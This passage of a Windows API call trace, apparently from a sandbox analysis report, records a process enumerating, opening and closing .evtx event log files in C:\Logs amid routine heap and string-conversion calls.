(lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.330] GetFileType (hFile=0x428) returned 0x1 [0072.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0072.330] CloseHandle (hObject=0x428) returned 1 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0072.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0072.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0072.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0072.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0072.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0072.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0072.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0072.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0072.331] AreFileApisANSI () returned 1 [0072.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x859e0 [0072.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 73 [0072.331] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.331] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx", cAlternateFileName="MI3773~1.EVT")) returned 1 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0072.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0072.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0072.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0072.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.332] AreFileApisANSI () returned 1 [0072.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx", lpUsedDefaultChar=0x0) returned 50 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.332] AreFileApisANSI () returned 1 [0072.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0072.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46978 [0072.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46978, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 50 [0072.333] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.420] GetFileType (hFile=0x420) returned 0x1 [0072.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0072.420] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.420] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.420] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.421] CloseHandle (hObject=0x420) returned 1 [0072.421] AreFileApisANSI () returned 1 [0072.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0072.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46668 [0072.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46668, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 50 [0072.426] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.427] GetFileType (hFile=0x420) returned 0x1 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0072.427] CloseHandle (hObject=0x420) returned 1 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.427] AreFileApisANSI () returned 1 [0072.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45e88 [0072.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 50 [0072.428] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.428] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx", cAlternateFileName="MI36AA~1.EVT")) returned 1 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0072.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0072.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.429] AreFileApisANSI () returned 1 [0072.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0072.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.429] AreFileApisANSI () returned 1 [0072.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0072.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 56 [0072.430] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.430] GetFileType (hFile=0x420) returned 0x1 [0072.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.430] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.430] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.430] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.430] CloseHandle (hObject=0x420) returned 1 [0072.431] AreFileApisANSI () returned 1 [0072.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0072.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 56 [0072.431] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.431] GetFileType (hFile=0x420) returned 0x1 [0072.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.431] CloseHandle (hObject=0x420) returned 1 [0072.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 